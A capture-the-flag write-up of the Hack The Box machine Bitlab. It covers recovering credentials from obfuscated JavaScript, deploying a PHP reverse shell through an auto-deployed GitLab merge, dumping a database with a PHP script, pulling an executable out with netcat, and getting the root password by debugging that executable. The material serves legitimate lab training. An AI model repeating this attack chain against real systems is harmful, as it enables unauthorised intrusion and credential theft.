This is a writeup of Bitlab from Hack The Box.


First, a full-port service discovery scan:

root@kali:~# nmap -sV -p-
Starting Nmap 7.70 ( ) at 2019-10-22 13:29 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 216.49 seconds


I started on the web server.

Screenshot 1

Then I ran dirbuster against it.

Screenshot 2

One file caught my attention.

Screenshot 3

The GitLab login link was not a URL at all but JavaScript, obfuscated by moving every identifier and string literal into an array and referencing them by index.


I cleaned it up:

'use strict';
(function() {
  /** @type {!Array} */
  // Every identifier and literal lives in this array; the body only refers to it by index.
  var a = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
  document[a[2]](a[1])[a[0]] = a[3];   // document.getElementById("user_login").value = "clave"
  document[a[2]](a[4])[a[0]] = a[5];   // document.getElementById("user_password").value = "11des0081x"
})();

The script simply fills in the login form, so the creds are clave / 11des0081x.
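
Reversing this by hand is fine for six strings, but the same pattern turns up with hundreds of entries. Below is an added example (my own code, not part of the original writeup) that undoes the index-array obfuscation mechanically: it parses the array declaration, rewrites every obj[a[n]] as a member access and every other a[n] as a string literal, then pulls out what gets written into each form field. The sample input is the bookmarklet as shown above; the parser assumes double-quoted strings with no escaped quotes, which covers this script.

```javascript
// Added example, not code from the original writeup: undo the "string
// array" obfuscation used by the GitLab login bookmarklet. The obfuscator
// moves every identifier and literal into one array and replaces each
// use with an index such as a[2]; reversing it means parsing that array
// and substituting every index back into the body.

// Constructed sample: the bookmarklet after beautifying.
const OBFUSCATED = `'use strict';
(function() {
  var a = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
  document[a[2]](a[1])[a[0]] = a[3];
  document[a[2]](a[4])[a[0]] = a[5];
})();`;

// Find the string-array declaration. Assumes double-quoted strings
// without escaped quotes or "]" inside them, which covers this sample.
function extractStringArray(src) {
  const m = src.match(/var\s+(\w+)\s*=\s*\[([^\]]*)\];\s*/);
  if (!m) throw new Error("no string array found");
  const items = [...m[2].matchAll(/"([^"]*)"/g)].map((x) => x[1]);
  return { decl: m[0], name: m[1], items };
}

function isIdentifier(s) {
  return /^[A-Za-z_$][\w$]*$/.test(s);
}

// Rewrite obj[a[n]] as obj.name (or obj["..."] when the string is not a
// valid identifier), then every remaining a[n] as a string literal, and
// drop the now-unused array declaration.
function deobfuscate(src) {
  const { decl, name, items } = extractStringArray(src);
  const member = new RegExp(`\\[${name}\\[(\\d+)\\]\\]`, "g");
  const value = new RegExp(`\\b${name}\\[(\\d+)\\]`, "g");
  return src
    .replace(decl, "")
    .replace(member, (_, i) => {
      const s = items[Number(i)];
      return isIdentifier(s) ? `.${s}` : `[${JSON.stringify(s)}]`;
    })
    .replace(value, (_, i) => JSON.stringify(items[Number(i)]));
}

// Pull out what the script writes into each input, keyed by element id.
function extractCredentials(src) {
  const creds = {};
  const re = /getElementById\("([^"]+)"\)\.value\s*=\s*"([^"]*)"/g;
  for (const m of deobfuscate(src).matchAll(re)) creds[m[1]] = m[2];
  return creds;
}

console.log(deobfuscate(OBFUSCATED));
console.log(extractCredentials(OBFUSCATED));
```

The output is the two plain document.getElementById(...).value = "..." assignments plus the object { user_login: "clave", user_password: "11des0081x" }. The member-access pass runs before the literal pass on purpose: once a[n] inside brackets has become .getElementById, the remaining a[n] tokens are all values and can be quoted safely.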

I used them on the sign-in page.

Screenshot 4

I checked the Deployer project, and inside its index.php:

Screenshot 5

So whenever something is merged into the Profile repo, the web server pulls it. I had a look at the Profile repo:

Screenshot 6

If that checkout lives in the web root, I can use the merge to deploy PHP, so I checked:

Screenshot 7

So if I merge PHP it'll show up here. I took a PHP reverse shell, pointed it at my own host, and made a branch in the Profile repo.

Screenshot 8

I then uploaded the shell file to the branch.

Screenshot 9

Opened a merge request:

Screenshot 10

And merged it:

Screenshot 11

Screenshot 12

I set up a listener:

root@kali:~# nc -nlvp 4444

Then I triggered the shell by browsing to the merged file.

In the listener:

connect to [] from (UNKNOWN) [] 53798
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 18:04:20 up 39 min,  0 users,  load average: 0.33, 0.18, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Upgrade to a proper TTY and start digging:

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@bitlab:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 Feb 28  2019 .
drwxr-xr-x 24 root  root  4096 Dec 31  2018 ..
drwxr-xr-x  4 clave clave 4096 Aug  8 14:40 clave

www-data@bitlab:/home$ cd clave
www-data@bitlab:/home/clave$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt

I need to be clave before I can read the flag, so more digging. On the GitLab instance I found:

Screenshot 13

So, database creds: user profiles, password profiles, for the profiles database on localhost.


I modified that connection code into a DB dump script called db-dump.php:

<?php
// Same connection string as the snippet on GitLab; dump every row of the profiles table.
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");

while ($row = pg_fetch_row($result)) {
  echo implode(" | ", $row);
  echo "<br />";
}

I repeated the process of creating a branch, uploading the file and merging it, then browsed to the file to run it:

Screenshot 14


The stored password looked base64-encoded, so I decoded it and tried the result over SSH, with no luck. This stumped me for a while before I tried the raw base64 string itself as the password instead:

root@kali:~# ssh clave@<target>

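That detour is worth turning into a habit: a value that merely looks like base64 is just as likely to be the literal secret. Below is an added example (my own code, not part of the original writeup) that builds the list of candidates in the order they should be tried: the literal first, and the decoded form only if the string is well-formed base64, round-trips exactly, and decodes to printable text. The sample values are constructed for the example.

```javascript
// Added example, not code from the original writeup: decide which forms
// of a stored credential are worth trying. A value that merely looks like
// base64 may be the literal password, so the literal always goes first and
// the decoded form is added only when the decode is well-formed,
// round-trips exactly, and yields printable text.
function looksLikeBase64(s) {
  return s.length > 0 && s.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(s);
}

function passwordCandidates(stored) {
  const candidates = [stored]; // the literal value is always tried first
  if (looksLikeBase64(stored)) {
    const buf = Buffer.from(stored, "base64");
    const decoded = buf.toString("utf8");
    // Re-encoding must give the original back; otherwise the padding or
    // trailing bits were wrong and this was never a real encoding.
    const roundTrips = buf.toString("base64") === stored;
    // Binary output is not a password anyone typed.
    const printable = /^[\x20-\x7e]+$/.test(decoded);
    if (roundTrips && printable && decoded !== stored) candidates.push(decoded);
  }
  return candidates;
}

// Constructed samples: a real encoding, an 8-character alphanumeric
// password that passes the alphabet check but decodes to junk, a value
// that decodes to NUL bytes, and a string that is not base64 at all.
console.log(passwordCandidates("aGVsbG8="));   // ["aGVsbG8=", "hello"]
console.log(passwordCandidates("Pass1234"));   // ["Pass1234"]
console.log(passwordCandidates("AAAA"));       // ["AAAA"]
console.log(passwordCandidates("11des0081x")); // ["11des0081x"]
```

The same check applies to anything that looks like hex or URL-encoding: decode it, but never throw the original away, and keep the original first in the queue.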
Now I can collect the flag:

clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt

clave@bitlab:~$ cat user.txt

Next I'll pull back the RemoteConnection.exe I found earlier: listen on kali and redirect into a file, then push it from the box. It is worth comparing a hash on both ends afterwards, since netcat gives no indication of a truncated transfer.

root@kali:~# nc -nlvp 5555 > RemoteConnection.exe

clave@bitlab:~$ nc 5555 < RemoteConnection.exe

Time to inspect it:

root@kali:~# file RemoteConnection.exe
RemoteConnection.exe: PE32 executable (console) Intel 80386, for MS Windows

I copied it over to a Windows VM with Immunity Debugger and stepped through its execution, watching what it built in memory:

Screenshot 15


I tried the value it revealed as root's SSH password:

root@kali:~# ssh root@<target>
Last login: Fri Sep 13 14:11:14 2019

Now to get my flag:

root@bitlab:~# id
uid=0(root) gid=0(root) groups=0(root)

root@bitlab:~# ls -la
total 48
drwx------  6 root root 4096 Sep  6 10:42 .
drwxr-xr-x 24 root root 4096 Dec 31  2018 ..
lrwxrwxrwx  1 root root    9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec 31  2018 .bashrc
drwx------  2 root root 4096 Aug  8 13:28 .cache
drwx------  3 root root 4096 Aug  8 13:28 .gnupg
drwxr-xr-x  3 root root 4096 Sep  6 10:40 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Feb 28  2019 root.txt
drw-------  2 root root 4096 Jan  4  2019 .ssh
-rw-------  1 root root 9915 Sep  6 10:42 .viminfo

root@bitlab:~# cat root.txt

